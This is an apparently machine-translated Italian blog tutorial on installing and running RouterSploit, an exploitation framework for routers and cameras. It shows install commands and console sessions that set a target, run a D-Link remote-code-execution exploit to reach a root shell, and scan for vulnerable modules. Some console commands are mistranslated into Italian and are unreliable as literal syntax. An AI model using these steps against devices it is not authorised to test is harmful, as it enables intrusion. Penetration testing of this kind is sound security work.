RouterSploit è un fantastico framework di sfruttamento realizzato appositamente per i dispositivi embedded.
Questo strumento può essere utilizzato da pentester per eseguire la scansione della sicurezza di telecamere e router.
Contenuti
Opzionale:
Segui i comandi seguenti:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Supporto Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Segui i comandi seguenti:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Supporto Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Segui i comandi seguenti:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
Segui i comandi seguenti:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
È necessario aggiornare RouterSploit spesso per evitare inconvenienti.
I nuovi moduli vengono spediti quasi ogni giorno.
cd routersploit
git pull
root @ kalidev:~ / git / routerploit # ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_ / / ___ _ _| |_ ___ _ __ `-. _ __ | | ___ _| |_ | // _ \| | | | __ / _ \ '__|`-. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __ / | /\__ / / |_) | | (_) | | |_ _| \_ ___ / __,_|\__ ___|_| \____ /| .__ /|_|\___ /|_|\__| | | Framework di sfruttamento per |_| di Threat9 Dispositivi incorporati Nome in codice : Sapevo che avresti portato guai Versione : 3.3.0 Homepage : https://www.threat9.com/ - @threatnine Unisciti a Slack : routerploit.slack.com Partecipa al programma beta di Threat9 - https://www.threat9.com/ Exploit: 128 Scanner: 4 Creds: 165 Generico: 4 Payload: 32 Codificatori: 6 rsf >
Per preformare lo sfruttamento, basta scegliere il modulo e impostare l'obiettivo:
rsf > utilizzare exploit / exploits / 2wire / exploits / asmax / exploits / asus / exploits / cisco / exploits / dlink / exploits / fortinet / exploits / juniper / exploits / linksys / exploits / multi / exploits / netgear / rsf > usa exploit / dlink / dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
Per il completamento utilizzare il tasto Tab.
Per visualizzare le opzioni, genere show
:
rsf (D-LINK DIR-300 & DIR-600 RCE) > mostra le opzioni Opzioni di destinazione: Nome Impostazioni correnti Descrizione ---- ---------------- ----------- target Indirizzo di destinazione ad es. http://192.168.1.1 porta 80 Porta di destinazione
Uso run
o exploit
comando per sfruttare il bersaglio:
rsf (D-LINK DIR-300 & DIR-600 RCE) > correre [+] L'obiettivo è vulnerabile [*] Richiamo del ciclo di comandi ... cmd > chi sono radice
Per impostare le opzioni:
rsf (D-LINK DIR-300 & DIR-600 RCE) > imposta target http://192.168.1.1 [+] {'bersaglio': 'http://192.168.1.1'}
È possibile verificare se il bersaglio è vulnerabile a un particolare exploit:
rsf (D-LINK DIR-300 & DIR-600 RCE) > dai un'occhiata [+] L'obiettivo è vulnerabile
Correre show info
per visualizzare informazioni sull'exploit.
Gli scanner consentono di verificare rapidamente se l'obiettivo è vulnerabile a eventuali exploit.
Utilizzare gli stessi comandi per visualizzare / impostare le opzioni, e anche a correre.
rsf (Scanner D-Link) > correre [+] exploits / dlink / dwr_932_info_disclosure è vulnerabile [-] exploits / dlink / dir_300_320_615_auth_bypass non è vulnerabile [-] exploits / dlink / dsl_2750b_info_disclosure non è vulnerabile [-] exploits / dlink / dns_320l_327l_rce non è vulnerabile [-] exploits / dlink / dir_645_password_disclosure non è vulnerabile [-] exploits / dlink / dir_300_600_615_info_disclosure non è vulnerabile [-] exploits / dlink / dir_300_600_rce non è vulnerabile [+] Il dispositivo è vulnerabile! - exploits / dlink / dwr_932_info_disclosure
Leggi anche: 1337x proxy
RouterSploit è uno strumento straordinario da usare.
In caso di problemi relativi a RouterSploit. Assicurati di commentare in basso. Il nostro team CSHAWK ti contatterà al più presto.
With the rise of many technological trends, all industries are reaping the benefits. Different technologies…
Online gaming is the latest normal in today’s fast-paced digital world. The internet now offers…
Tax season: the time of year many individuals and businesses dread. The weight of ensuring…
As we enter in the final months of 2023, we can talk more clearly about…
Dalla sua uscita nel 2011, Minecraft has become one of the most played video games…
Minecraft è attivo da più di un decennio, and in that time it has…
This website uses cookies.